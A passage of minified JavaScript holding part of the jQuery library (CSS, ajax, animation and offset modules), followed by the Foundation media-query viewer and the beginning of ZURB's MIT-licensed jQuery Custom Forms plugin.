}return u=null,h},cleanData:function(e,t){var n,r,i,s,o=0,u=y.expando,a=y.cache,l=y.support.deleteExpando,c=y.event.special;for(;(i=e[o])!=null;o++)if(t||y.acceptData(i)){r=i[u],n=r&&a[r];if(n){if(n.events)for(s in n.events)c[s]?y.event.remove(i,s):y.removeEvent(i,s,n.handle);a[r]&&(delete a[r],l?delete i[u]:typeof i.removeAttribute!="undefined"?i.removeAttribute(u):i[u]=null,f.push(r))}}}});var jt,Ft,It,qt=/alpha\([^)]*\)/i,Rt=/opacity\s*=\s*([^)]*)/,Ut=/^(top|right|bottom|left)$/,zt=/^(none|table(?!-c[ea]).+)/,Wt=/^margin/,Xt=new RegExp("^("+b+")(.*)$","i"),Vt=new RegExp("^("+b+")(?!px)[a-z%]+$","i"),$t=new RegExp("^([+-])=("+b+")","i"),Jt={BODY:"block"},Kt={position:"absolute",visibility:"hidden",display:"block"},Qt={letterSpacing:0,fontWeight:400},Gt=["Top","Right","Bottom","Left"],Yt=["Webkit","O","Moz","ms"];y.fn.extend({css:function(e,n){return y.access(this,function(e,n,r){var i,s,o={},u=0;if(y.isArray(n)){i=Ft(e),s=n.length;for(;u<s;u++)o[n[u]]=y.css(e,n[u],!1,i);return o}return r!==t?y.style(e,n,r):y.css(e,n)},e,n,arguments.length>1)},show:function(){return tn(this,!0)},hide:function(){return tn(this)},toggle:function(e){var t=typeof e=="boolean";return this.each(function(){(t?e:en(this))?y(this).show():y(this).hide()})}}),y.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=jt(e,"opacity");return n===""?"1":n}}}},cssNumber:{columnCount:!0,fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":y.support.cssFloat?"cssFloat":"styleFloat"},style:function(e,n,r,i){if(!e||e.nodeType===3||e.nodeType===8||!e.style)return;var s,o,u,a=y.camelCase(n),f=e.style;n=y.cssProps[a]||(y.cssProps[a]=Zt(f,a)),u=y.cssHooks[n]||y.cssHooks[a];if(r===t)return u&&"get"in u&&(s=u.get(e,!1,i))!==t?s:f[n];o=typeof r,o==="string"&&(s=$t.exec(r))&&(r=(s[1]+1)*s[2]+parseFloat(y.css(e,n)),o="number");if(r==null||o==="number"&&isNaN(r))return;o==="number"&&!y.cssNumber[a]&&(r+="px"),!y.support.clearCloneStyle&&r===""&&n.indexOf("background")===0&&(f[n]="inherit");if(!u||!("set"in u)||(r=u.set(e,r,i))!==t)try{f[n]=r}catch(l){}},css:function(e,n,r,i){var s,o,u,a=y.camelCase(n);return n=y.cssProps[a]||(y.cssProps[a]=Zt(e.style,a)),u=y.cssHooks[n]||y.cssHooks[a],u&&"get"in u&&(s=u.get(e,!0,r)),s===t&&(s=jt(e,n,i)),s==="normal"&&n in Qt&&(s=Qt[n]),r?(o=parseFloat(s),r===!0||y.isNumeric(o)?o||0:s):s},swap:function(e,t,n,r){var i,s,o={};for(s in t)o[s]=e.style[s],e.style[s]=t[s];i=n.apply(e,r||[]);for(s in t)e.style[s]=o[s];return i}}),e.getComputedStyle?(Ft=function(t){return e.getComputedStyle(t,null)},jt=function(e,n,r){var i,s,o,u=r||Ft(e),a=u?u.getPropertyValue(n)||u[n]:t,f=e.style;return u&&(a===""&&!y.contains(e.ownerDocument,e)&&(a=y.style(e,n)),Vt.test(a)&&Wt.test(n)&&(i=f.width,s=f.minWidth,o=f.maxWidth,f.minWidth=f.maxWidth=f.width=a,a=u.width,f.width=i,f.minWidth=s,f.maxWidth=o)),a}):i.documentElement.currentStyle&&(Ft=function(e){return e.currentStyle},jt=function(e,n,r){var i,s,o,u=r||Ft(e),a=u?u[n]:t,f=e.style;return a==null&&f&&f[n]&&(a=f[n]),Vt.test(a)&&!Ut.test(n)&&(i=f.left,s=e.runtimeStyle,o=s&&s.left,o&&(s.left=e.currentStyle.left),f.left=n==="fontSize"?"1em":a,a=f.pixelLeft+"px",f.left=i,o&&(s.left=o)),a===""?"auto":a}),y.each(["height","width"],function(e,t){y.cssHooks[t]={get:function(e,n,r){if(n)return e.offsetWidth===0&&zt.test(y.css(e,"display"))?y.swap(e,Kt,function(){return sn(e,t,r)}):sn(e,t,r)},set:function(e,n,r){var i=r&&Ft(e);return nn(e,n,r?rn(e,t,r,y.support.boxSizing&&y.css(e,"boxSizing",!1,i)==="border-box",i):0)}}}),y.support.opacity||(y.cssHooks.opacity={get:function(e,t){return Rt.test((t&&e.currentStyle?e.currentStyle.filter:e.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":t?"1":""},set:function(e,t){var n=e.style,r=e.currentStyle,i=y.isNumeric(t)?"alpha(opacity="+t*100+")":"",s=r&&r.filter||n.filter||"";n.zoom=1;if((t>=1||t==="")&&y.trim(s.replace(qt,""))===""&&n.removeAttribute){n.removeAttribute("filter");if(t===""||r&&!r.filter)return}n.filter=qt.test(s)?s.replace(qt,i):s+" "+i}}),y(function(){y.support.reliableMarginRight||(y.cssHooks.marginRight={get:function(e,t){if(t)return y.swap(e,{display:"inline-block"},jt,[e,"marginRight"])}}),!y.support.pixelPosition&&y.fn.position&&y.each(["top","left"],function(e,t){y.cssHooks[t]={get:function(e,n){if(n)return n=jt(e,t),Vt.test(n)?y(e).position()[t]+"px":n}}})}),y.expr&&y.expr.filters&&(y.expr.filters.hidden=function(e){return e.offsetWidth===0&&e.offsetHeight===0||!y.support.reliableHiddenOffsets&&(e.style&&e.style.display||y.css(e,"display"))==="none"},y.expr.filters.visible=function(e){return!y.expr.filters.hidden(e)}),y.each({margin:"",padding:"",border:"Width"},function(e,t){y.cssHooks[e+t]={expand:function(n){var r=0,i={},s=typeof n=="string"?n.split(" "):[n];for(;r<4;r++)i[e+Gt[r]+t]=s[r]||s[r-2]||s[0];return i}},Wt.test(e)||(y.cssHooks[e+t].set=nn)});var an=/%20/g,fn=/\[\]$/,ln=/\r?\n/g,cn=/^(?:submit|button|image|reset)$/i,hn=/^(?:input|select|textarea|keygen)/i;y.fn.extend({serialize:function(){return y.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var e=y.prop(this,"elements");return e?y.makeArray(e):this}).filter(function(){var e=this.type;return this.name&&!y(this).is(":disabled")&&hn.test(this.nodeName)&&!cn.test(e)&&(this.checked||!Et.test(e))}).map(function(e,t){var n=y(this).val();return n==null?null:y.isArray(n)?y.map(n,function(e){return{name:t.name,value:e.replace(ln,"\r\n")}}):{name:t.name,value:n.replace(ln,"\r\n")}}).get()}}),y.param=function(e,n){var r,i=[],s=function(e,t){t=y.isFunction(t)?t():t==null?"":t,i[i.length]=encodeURIComponent(e)+"="+encodeURIComponent(t)};n===t&&(n=y.ajaxSettings&&y.ajaxSettings.traditional);if(y.isArray(e)||e.jquery&&!y.isPlainObject(e))y.each(e,function(){s(this.name,this.value)});else for(r in e)pn(r,e[r],n,s);return i.join("&").replace(an,"+")};var dn,vn,mn=y.now(),gn=/\?/,yn=/#.*$/,bn=/([?&])_=[^&]*/,wn=/^(.*?):[ \t]*([^\r\n]*)\r?$/mg,En=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Sn=/^(?:GET|HEAD)$/,xn=/^\/\//,Tn=/^([\w.+-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/,Nn=y.fn.load,Cn={},kn={},Ln="*/".concat("*");try{vn=s.href}catch(An){vn=i.createElement("a"),vn.href="",vn=vn.href}dn=Tn.exec(vn.toLowerCase())||[],y.fn.load=function(e,n,r){if(typeof e!="string"&&Nn)return Nn.apply(this,arguments);var i,s,o,u=this,a=e.indexOf(" ");return a>=0&&(i=e.slice(a,e.length),e=e.slice(0,a)),y.isFunction(n)?(r=n,n=t):n&&typeof n=="object"&&(s="POST"),u.length>0&&y.ajax({url:e,type:s,dataType:"html",data:n}).done(function(e){o=arguments,u.html(i?y("<div>").append(y.parseHTML(e)).find(i):e)}).complete(r&&function(e,t){u.each(r,o||[e.responseText,t,e])}),this},y.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,t){y.fn[t]=function(e){return this.on(t,e)}}),y.each(["get","post"],function(e,n){y[n]=function(e,r,i,s){return y.isFunction(r)&&(s=s||i,i=r,r=t),y.ajax({url:e,type:n,dataType:s,data:r,success:i})}}),y.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:vn,type:"GET",isLocal:En.test(dn[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":Ln,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText"},converters:{"* text":e.String,"text html":!0,"text json":y.parseJSON,"text xml":y.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(e,t){return t?_n(_n(e,y.ajaxSettings),t):_n(y.ajaxSettings,e)},ajaxPrefilter:On(Cn),ajaxTransport:On(kn),ajax:function(e,n){function N(e,n,o,a){var l,g,b,w,S,T=n;if(E===2)return;E=2,u&&clearTimeout(u),r=t,s=a||"",x.readyState=e>0?4:0,o&&(w=Dn(c,x,o));if(e>=200&&e<300||e===304)c.ifModified&&(S=x.getResponseHeader("Last-Modified"),S&&(y.lastModified[i]=S),S=x.getResponseHeader("etag"),S&&(y.etag[i]=S)),e===304?(l=!0,T="notmodified"):(l=Pn(c,w),T=l.state,g=l.data,b=l.error,l=!b);else{b=T;if(e||!T)T="error",e<0&&(e=0)}x.status=e,x.statusText=(n||T)+"",l?d.resolveWith(h,[g,T,x]):d.rejectWith(h,[x,T,b]),x.statusCode(m),m=t,f&&p.trigger(l?"ajaxSuccess":"ajaxError",[x,c,l?g:b]),v.fireWith(h,[x,T]),f&&(p.trigger("ajaxComplete",[x,c]),--y.active||y.event.trigger("ajaxStop"))}typeof e=="object"&&(n=e,e=t),n=n||{};var r,i,s,o,u,a,f,l,c=y.ajaxSetup({},n),h=c.context||c,p=c.context&&(h.nodeType||h.jquery)?y(h):y.event,d=y.Deferred(),v=y.Callbacks("once memory"),m=c.statusCode||{},g={},b={},E=0,S="canceled",x={readyState:0,getResponseHeader:function(e){var t;if(E===2){if(!o){o={};while(t=wn.exec(s))o[t[1].toLowerCase()]=t[2]}t=o[e.toLowerCase()]}return t==null?null:t},getAllResponseHeaders:function(){return E===2?s:null},setRequestHeader:function(e,t){var n=e.toLowerCase();return E||(e=b[n]=b[n]||e,g[e]=t),this},overrideMimeType:function(e){return E||(c.mimeType=e),this},statusCode:function(e){var t;if(e)if(E<2)for(t in e)m[t]=[m[t],e[t]];else x.always(e[x.status]);return this},abort:function(e){var t=e||S;return r&&r.abort(t),N(0,t),this}};d.promise(x).complete=v.add,x.success=x.done,x.error=x.fail,c.url=((e||c.url||vn)+"").replace(yn,"").replace(xn,dn[1]+"//"),c.type=n.method||n.type||c.method||c.type,c.dataTypes=y.trim(c.dataType||"*").toLowerCase().match(w)||[""],c.crossDomain==null&&(a=Tn.exec(c.url.toLowerCase()),c.crossDomain=!(!a||a[1]===dn[1]&&a[2]===dn[2]&&(a[3]||(a[1]==="http:"?80:443))==(dn[3]||(dn[1]==="http:"?80:443)))),c.data&&c.processData&&typeof c.data!="string"&&(c.data=y.param(c.data,c.traditional)),Mn(Cn,c,n,x);if(E===2)return x;f=c.global,f&&y.active++===0&&y.event.trigger("ajaxStart"),c.type=c.type.toUpperCase(),c.hasContent=!Sn.test(c.type),i=c.url,c.hasContent||(c.data&&(i=c.url+=(gn.test(i)?"&":"?")+c.data,delete c.data),c.cache===!1&&(c.url=bn.test(i)?i.replace(bn,"$1_="+mn++):i+(gn.test(i)?"&":"?")+"_="+mn++)),c.ifModified&&(y.lastModified[i]&&x.setRequestHeader("If-Modified-Since",y.lastModified[i]),y.etag[i]&&x.setRequestHeader("If-None-Match",y.etag[i])),(c.data&&c.hasContent&&c.contentType!==!1||n.contentType)&&x.setRequestHeader("Content-Type",c.contentType),x.setRequestHeader("Accept",c.dataTypes[0]&&c.accepts[c.dataTypes[0]]?c.accepts[c.dataTypes[0]]+(c.dataTypes[0]!=="*"?", "+Ln+"; q=0.01":""):c.accepts["*"]);for(l in c.headers)x.setRequestHeader(l,c.headers[l]);if(!c.beforeSend||c.beforeSend.call(h,x,c)!==!1&&E!==2){S="abort";for(l in{success:1,error:1,complete:1})x[l](c[l]);r=Mn(kn,c,n,x);if(!r)N(-1,"No Transport");else{x.readyState=1,f&&p.trigger("ajaxSend",[x,c]),c.async&&c.timeout>0&&(u=setTimeout(function(){x.abort("timeout")},c.timeout));try{E=1,r.send(g,N)}catch(T){if(!(E<2))throw T;N(-1,T)}}return x}return x.abort()},getScript:function(e,n){return y.get(e,t,n,"script")},getJSON:function(e,t,n){return y.get(e,t,n,"json")}}),y.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(e){return y.globalEval(e),e}}}),y.ajaxPrefilter("script",function(e){e.cache===t&&(e.cache=!1),e.crossDomain&&(e.type="GET",e.global=!1)}),y.ajaxTransport("script",function(e){if(e.crossDomain){var n,r=i.head||y("head")[0]||i.documentElement;return{send:function(t,s){n=i.createElement("script"),n.async=!0,e.scriptCharset&&(n.charset=e.scriptCharset),n.src=e.url,n.onload=n.onreadystatechange=function(e,t){if(t||!n.readyState||/loaded|complete/.test(n.readyState))n.onload=n.onreadystatechange=null,n.parentNode&&n.parentNode.removeChild(n),n=null,t||s(200,"success")},r.insertBefore(n,r.firstChild)},abort:function(){n&&n.onload(t,!0)}}}});var Hn=[],Bn=/(=)\?(?=&|$)|\?\?/;y.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=Hn.pop()||y.expando+"_"+mn++;return this[e]=!0,e}}),y.ajaxPrefilter("json jsonp",function(n,r,i){var s,o,u,a=n.jsonp!==!1&&(Bn.test(n.url)?"url":typeof n.data=="string"&&!(n.contentType||"").indexOf("application/x-www-form-urlencoded")&&Bn.test(n.data)&&"data");if(a||n.dataTypes[0]==="jsonp")return s=n.jsonpCallback=y.isFunction(n.jsonpCallback)?n.jsonpCallback():n.jsonpCallback,a?n[a]=n[a].replace(Bn,"$1"+s):n.jsonp!==!1&&(n.url+=(gn.test(n.url)?"&":"?")+n.jsonp+"="+s),n.converters["script json"]=function(){return u||y.error(s+" was not called"),u[0]},n.dataTypes[0]="json",o=e[s],e[s]=function(){u=arguments},i.always(function(){e[s]=o,n[s]&&(n.jsonpCallback=r.jsonpCallback,Hn.push(s)),u&&y.isFunction(o)&&o(u[0]),u=o=t}),"script"});var jn,Fn,In=0,qn=e.ActiveXObject&&function(){var e;for(e in jn)jn[e](t,!0)};y.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&Rn()||Un()}:Rn,Fn=y.ajaxSettings.xhr(),y.support.cors=!!Fn&&"withCredentials"in Fn,Fn=y.support.ajax=!!Fn,Fn&&y.ajaxTransport(function(n){if(!n.crossDomain||y.support.cors){var r;return{send:function(i,s){var o,u,a=n.xhr();n.username?a.open(n.type,n.url,n.async,n.username,n.password):a.open(n.type,n.url,n.async);if(n.xhrFields)for(u in n.xhrFields)a[u]=n.xhrFields[u];n.mimeType&&a.overrideMimeType&&a.overrideMimeType(n.mimeType),!n.crossDomain&&!i["X-Requested-With"]&&(i["X-Requested-With"]="XMLHttpRequest");try{for(u in i)a.setRequestHeader(u,i[u])}catch(f){}a.send(n.hasContent&&n.data||null),r=function(e,i){var u,f,l,c,h;try{if(r&&(i||a.readyState===4)){r=t,o&&(a.onreadystatechange=y.noop,qn&&delete jn[o]);if(i)a.readyState!==4&&a.abort();else{c={},u=a.status,h=a.responseXML,l=a.getAllResponseHeaders(),h&&h.documentElement&&(c.xml=h),typeof a.responseText=="string"&&(c.text=a.responseText);try{f=a.statusText}catch(p){f=""}!u&&n.isLocal&&!n.crossDomain?u=c.text?200:404:u===1223&&(u=204)}}}catch(d){i||s(-1,d)}c&&s(u,f,c,l)},n.async?a.readyState===4?setTimeout(r):(o=++In,qn&&(jn||(jn={},y(e).unload(qn)),jn[o]=r),a.onreadystatechange=r):r()},abort:function(){r&&r(t,!0)}}}});var zn,Wn,Xn=/^(?:toggle|show|hide)$/,Vn=new RegExp("^(?:([+-])=|)("+b+")([a-z%]*)$","i"),$n=/queueHooks$/,Jn=[er],Kn={"*":[function(e,t){var n,r,i=this.createTween(e,t),s=Vn.exec(t),o=i.cur(),u=+o||0,a=1,f=20;if(s){n=+s[2],r=s[3]||(y.cssNumber[e]?"":"px");if(r!=="px"&&u){u=y.css(i.elem,e,!0)||n||1;do a=a||".5",u/=a,y.style(i.elem,e,u+r);while(a!==(a=i.cur()/o)&&a!==1&&--f)}i.unit=r,i.start=u,i.end=s[1]?u+(s[1]+1)*n:n}return i}]};y.Animation=y.extend(Yn,{tweener:function(e,t){y.isFunction(e)?(t=e,e=["*"]):e=e.split(" ");var n,r=0,i=e.length;for(;r<i;r++)n=e[r],Kn[n]=Kn[n]||[],Kn[n].unshift(t)},prefilter:function(e,t){t?Jn.unshift(e):Jn.push(e)}}),y.Tween=tr,tr.prototype={constructor:tr,init:function(e,t,n,r,i,s){this.elem=e,this.prop=n,this.easing=i||"swing",this.options=t,this.start=this.now=this.cur(),this.end=r,this.unit=s||(y.cssNumber[n]?"":"px")},cur:function(){var e=tr.propHooks[this.prop];return e&&e.get?e.get(this):tr.propHooks._default.get(this)},run:function(e){var t,n=tr.propHooks[this.prop];return this.options.duration?this.pos=t=y.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):this.pos=t=e,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):tr.propHooks._default.set(this),this}},tr.prototype.init.prototype=tr.prototype,tr.propHooks={_default:{get:function(e){var t;return e.elem[e.prop]==null||!!e.elem.style&&e.elem.style[e.prop]!=null?(t=y.css(e.elem,e.prop,"auto"),!t||t==="auto"?0:t):e.elem[e.prop]},set:function(e){y.fx.step[e.prop]?y.fx.step[e.prop](e):e.elem.style&&(e.elem.style[y.cssProps[e.prop]]!=null||y.cssHooks[e.prop])?y.style(e.elem,e.prop,e.now+e.unit):e.elem[e.prop]=e.now}}},tr.propHooks.scrollTop=tr.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},y.each(["toggle","show","hide"],function(e,t){var n=y.fn[t];y.fn[t]=function(e,r,i){return e==null||typeof e=="boolean"?n.apply(this,arguments):this.animate(nr(t,!0),e,r,i)}}),y.fn.extend({fadeTo:function(e,t,n,r){return this.filter(en).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(e,t,n,r){var i=y.isEmptyObject(e),s=y.speed(t,n,r),o=function(){var t=Yn(this,y.extend({},e),s);o.finish=function(){t.stop(!0)},(i||y._data(this,"finish"))&&t.stop(!0)};return o.finish=o,i||s.queue===!1?this.each(o):this.queue(s.queue,o)},stop:function(e,n,r){var i=function(e){var t=e.stop;delete e.stop,t(r)};return typeof e!="string"&&(r=n,n=e,e=t),n&&e!==!1&&this.queue(e||"fx",[]),this.each(function(){var t=!0,n=e!=null&&e+"queueHooks",s=y.timers,o=y._data(this);if(n)o[n]&&o[n].stop&&i(o[n]);else for(n in o)o[n]&&o[n].stop&&$n.test(n)&&i(o[n]);for(n=s.length;n--;)s[n].elem===this&&(e==null||s[n].queue===e)&&(s[n].anim.stop(r),t=!1,s.splice(n,1));(t||!r)&&y.dequeue(this,e)})},finish:function(e){return e!==!1&&(e=e||"fx"),this.each(function(){var t,n=y._data(this),r=n[e+"queue"],i=n[e+"queueHooks"],s=y.timers,o=r?r.length:0;n.finish=!0,y.queue(this,e,[]),i&&i.cur&&i.cur.finish&&i.cur.finish.call(this);for(t=s.length;t--;)s[t].elem===this&&s[t].queue===e&&(s[t].anim.stop(!0),s.splice(t,1));for(t=0;t<o;t++)r[t]&&r[t].finish&&r[t].finish.call(this);delete n.finish})}}),y.each({slideDown:nr("show"),slideUp:nr("hide"),slideToggle:nr("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){y.fn[e]=function(e,n,r){return this.animate(t,e,n,r)}}),y.speed=function(e,t,n){var r=e&&typeof e=="object"?y.extend({},e):{complete:n||!n&&t||y.isFunction(e)&&e,duration:e,easing:n&&t||t&&!y.isFunction(t)&&t};r.duration=y.fx.off?0:typeof r.duration=="number"?r.duration:r.duration in y.fx.speeds?y.fx.speeds[r.duration]:y.fx.speeds._default;if(r.queue==null||r.queue===!0)r.queue="fx";return r.old=r.complete,r.complete=function(){y.isFunction(r.old)&&r.old.call(this),r.queue&&y.dequeue(this,r.queue)},r},y.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2}},y.timers=[],y.fx=tr.prototype.init,y.fx.tick=function(){var e,n=y.timers,r=0;zn=y.now();for(;r<n.length;r++)e=n[r],!e()&&n[r]===e&&n.splice(r--,1);n.length||y.fx.stop(),zn=t},y.fx.timer=function(e){e()&&y.timers.push(e)&&y.fx.start()},y.fx.interval=13,y.fx.start=function(){Wn||(Wn=setInterval(y.fx.tick,y.fx.interval))},y.fx.stop=function(){clearInterval(Wn),Wn=null},y.fx.speeds={slow:600,fast:200,_default:400},y.fx.step={},y.expr&&y.expr.filters&&(y.expr.filters.animated=function(e){return y.grep(y.timers,function(t){return e===t.elem}).length}),y.fn.offset=function(e){if(arguments.length)return e===t?this:this.each(function(t){y.offset.setOffset(this,e,t)});var n,r,i={top:0,left:0},s=this[0],o=s&&s.ownerDocument;if(!o)return;return n=o.documentElement,y.contains(n,s)?(typeof s.getBoundingClientRect!="undefined"&&(i=s.getBoundingClientRect()),r=rr(o),{top:i.top+(r.pageYOffset||n.scrollTop)-(n.clientTop||0),left:i.left+(r.pageXOffset||n.scrollLeft)-(n.clientLeft||0)}):i},y.offset={setOffset:function(e,t,n){var r=y.css(e,"position");r==="static"&&(e.style.position="relative");var i=y(e),s=i.offset(),o=y.css(e,"top"),u=y.css(e,"left"),a=(r==="absolute"||r==="fixed")&&y.inArray("auto",[o,u])>-1,f={},l={},c,h;a?(l=i.position(),c=l.top,h=l.left):(c=parseFloat(o)||0,h=parseFloat(u)||0),y.isFunction(t)&&(t=t.call(e,n,s)),t.top!=null&&(f.top=t.top-s.top+c),t.left!=null&&(f.left=t.left-s.left+h),"using"in t?t.using.call(e,f):i.css(f)}},y.fn.extend({position:function(){if(!this[0])return;var e,t,n={top:0,left:0},r=this[0];return y.css(r,"position")==="fixed"?t=r.getBoundingClientRect():(e=this.offsetParent(),t=this.offset(),y.nodeName(e[0],"html")||(n=e.offset()),n.top+=y.css(e[0],"borderTopWidth",!0),n.left+=y.css(e[0],"borderLeftWidth",!0)),{top:t.top-n.top-y.css(r,"marginTop",!0),left:t.left-n.left-y.css(r,"marginLeft",!0)}},offsetParent:function(){return this.map(function(){var e=this.offsetParent||i.documentElement;while(e&&!y.nodeName(e,"html")&&y.css(e,"position")==="static")e=e.offsetParent;return e||i.documentElement})}}),y.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,n){var r=/Y/.test(n);y.fn[e]=function(i){return y.access(this,function(e,i,s){var o=rr(e);if(s===t)return o?n in o?o[n]:o.document.documentElement[i]:e[i];o?o.scrollTo(r?y(o).scrollLeft():s,r?s:y(o).scrollTop()):e[i]=s},e,i,arguments.length,null)}}),y.each({Height:"height",Width:"width"},function(e,n){y.each({padding:"inner"+e,content:n,"":"outer"+e},function(r,i){y.fn[i]=function(i,s){var o=arguments.length&&(r||typeof i!="boolean"),u=r||(i===!0||s===!0?"margin":"border");return y.access(this,function(n,r,i){var s;return y.isWindow(n)?n.document.documentElement["client"+e]:n.nodeType===9?(s=n.documentElement,Math.max(n.body["scroll"+e],s["scroll"+e],n.body["offset"+e],s["offset"+e],s["client"+e])):i===t?y.css(n,r,u):y.style(n,r,i,u)},n,o?i:t,o,null)}})}),e.jQuery=e.$=y,typeof define=="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return y})})(window); (function(e,t,n){"use strict";e.fn.foundationMediaQueryViewer=function(t){var n=e.extend(t,{toggleKey:77}),r=e(document);r.on("keyup.mediaQueryViewer",":input",function(e){e.which===n.toggleKey&&e.stopPropagation()}),r.on("keyup.mediaQueryViewer",function(t){var r=e("#fqv");t.which===n.toggleKey&&(r.length>0?r.remove():e("body").prepend('<div id="fqv" style="position:fixed;top:4px;left:4px;z-index:999;color:#fff;"><p style="font-size:12px;background:rgba(0,0,0,0.75);padding:5px;margin-bottom:1px;line-height:1.2;"><span class="left">Media:</span> <span style="font-weight:bold;" class="show-for-xlarge">Extra Large</span><span style="font-weight:bold;" class="show-for-large">Large</span><span style="font-weight:bold;" class="show-for-medium">Medium</span><span style="font-weight:bold;" class="show-for-small">Small</span><span style="font-weight:bold;" class="show-for-landscape">Landscape</span><span style="font-weight:bold;" class="show-for-portrait">Portrait</span><span style="font-weight:bold;" class="show-for-touch">Touch</span></p></div>'))})}})(jQuery,this); /* * jQuery Custom Forms Plugin 1.0 * www.ZURB.com * Copyright 2010, ZURB * Free to use under the MIT license. * http://www.opensource.org/licenses/mit-license.php */ (function(e){var t=function(){return{tmp:[],hidden:null,adjust:function(t){var n=this;n.hidden=t.parents().andSelf().filter(":hidden"),n.hidden.each(function(){var t=e(this);n.tmp.push(t.attr("style")),t.css({visibility:"hidden",display:"block"})})},reset:function(){var t=this;t.hidden.each(function(n){var r=e(this),i=t.tmp[n];i===undefined?r.removeAttr("style"):r.attr("style",i)}),t.tmp=[],t.hidden=null}}};jQuery.foundation=jQuery.foundation||{},jQuery.foundation.customForms=jQuery.foundation.customForms||{},e.foundation.customForms.appendCustomMarkup=function(n){function i(t,n){var r=e(n).hide(),i=r.attr("type"),s=r.next("span.custom."+i);s.length===0&&(s=e('<span class="custom '+i+'"></span>').insertAfter(r)),s.toggleClass("checked",r.is(":checked")),s.toggleClass("disabled",r.is(":disabled"))}function s(r,i){var s=t(),o=e(i),u=o.next("div.custom.dropdown"),a=u.find("ul"),f=u.find(".current"),l=u.find(".selector"),c=o.find("option"),h=c.filter(":selected"),p=0,d="",v,m=!1;if(o.hasClass(n.disable_class))return;if(u.length===0){var g=o.hasClass("small")?"small":o.hasClass("medium")?"medium":o.hasClass("large")?"large":o.hasClass("expand")?"expand":"";u=e('<div class="'+["custom","dropdown",g].join(" ")+'"><a href="#" class="selector"></a><ul /></div>'),l=u.find(".selector"),a=u.find("ul"),d=c.map(function(){return"<li>"+e(this).html()+"</li>"}).get().join(""),a.append(d),m=u.prepend('<a href="#" class="current">'+h.html()+"</a>").find(".current"),o.after(u).hide()}else d=c.map(function(){return"<li>"+e(this).html()+"</li>"}).get().join(""),a.html("").append(d);u.toggleClass("disabled",o.is(":disabled")),v=a.find("li"),c.each(function(t){this.selected&&(v.eq(t).addClass("selected"),m&&m.html(e(this).html()))}),a.css("width","auto"),u.css("width","auto"),u.is(".small, .medium, .large, .expand")||(u.addClass("open"),s.adjust(a),p=v.outerWidth()>p?v.outerWidth():p,s.reset(),u.removeClass("open"),u.width(p+18),a.width(p+16))}var r={disable_class:"no-custom"};n=e.extend(r,n),e("form.custom input:radio[data-customforms!=disabled]").each(i),e("form.custom input:checkbox[data-customforms!=disabled]").each(i),e("form.custom select[data-customforms!=disabled]").each(s)};var n=function(t){var n=0,r=t.next();$options=t.find("option"),r.find("ul").html(""),$options.each(function(){$li=e("<li>"+e(this).html()+"</li>"),r.find("ul").append($li)}),$options.each(function(t){this.selected&&(r.find("li").eq(t).addClass("selected"),r.find(".current").html(e(this).html()))}),r.removeAttr("style").find("ul").removeAttr("style"),r.find("li").each(function(){r.addClass("open"),e(this).outerWidth()>n&&(n=e(this).outerWidth()),r.removeClass("open")}),r.css("width",n+18+"px"),r.find("ul").css("width",n+16+"px")},r=function(e){var t=e.prev(),n=t[0];!1===t.is(":disabled")&&(n.checked=n.checked?!1:!0,e.toggleClass("checked"),t.trigger("change"))},i=function(e){var t=e.prev(),n=t.closest("form.custom"),r=t[0];!1===t.is(":disabled")&&(n.find('input:radio[name="'+t.attr("name")+'"]').next().not(e).removeClass("checked"),e.hasClass("checked")||e.toggleClass("checked"),r.checked=e.hasClass("checked"),t.trigger("change"))};e(document).on("click","form.custom span.custom.checkbox",function(t){t.preventDefault(),t.stopPropagation(),r(e(this))}),e(document).on("click","form.custom span.custom.radio",function(t){t.preventDefault(),t.stopPropagation(),i(e(this))}),e(document).on("change","form.custom select[data-customforms!=disabled]",function(t){n(e(this))}),e(document).on("click","form.custom label",function(t){var n=e("#"+e(this).attr("for")+"[data-customforms!=disabled]"),s,o;n.length!==0&&(n.attr("type")==="checkbox"?(t.preventDefault(),s=e(this).find("span.custom.checkbox"),s.length==0&&(s=e(this).next("span.custom.checkbox")),s.length==0&&(s=e(this).prev("span.custom.checkbox")),r(s)):n.attr("type")==="radio"&&(t.preventDefault(),o=e(this).find("span.custom.radio"),o.length==0&&(o=e(this).next("span.custom.radio")),o.length==0&&(o=e(this).prev("span.custom.radio")),i(o)))}),e(document).on("click","form.custom div.custom.dropdown a.current, form.custom div.custom.dropdown a.selector",function(t){var n=e(this),r=n.closest("div.custom.dropdown"),i=r.prev();t.preventDefault(),e("div.dropdown").removeClass("open");if(!1===i.is(":disabled"))return r.toggleClass("open"),r.hasClass("open")?e(document).bind("click.customdropdown",function(t){r.removeClass("open"),e(document).unbind(".customdropdown")}):e(document).unbind(".customdropdown"),!1}),e(document).on("click","form.custom div.custom.dropdown li",function(t){var 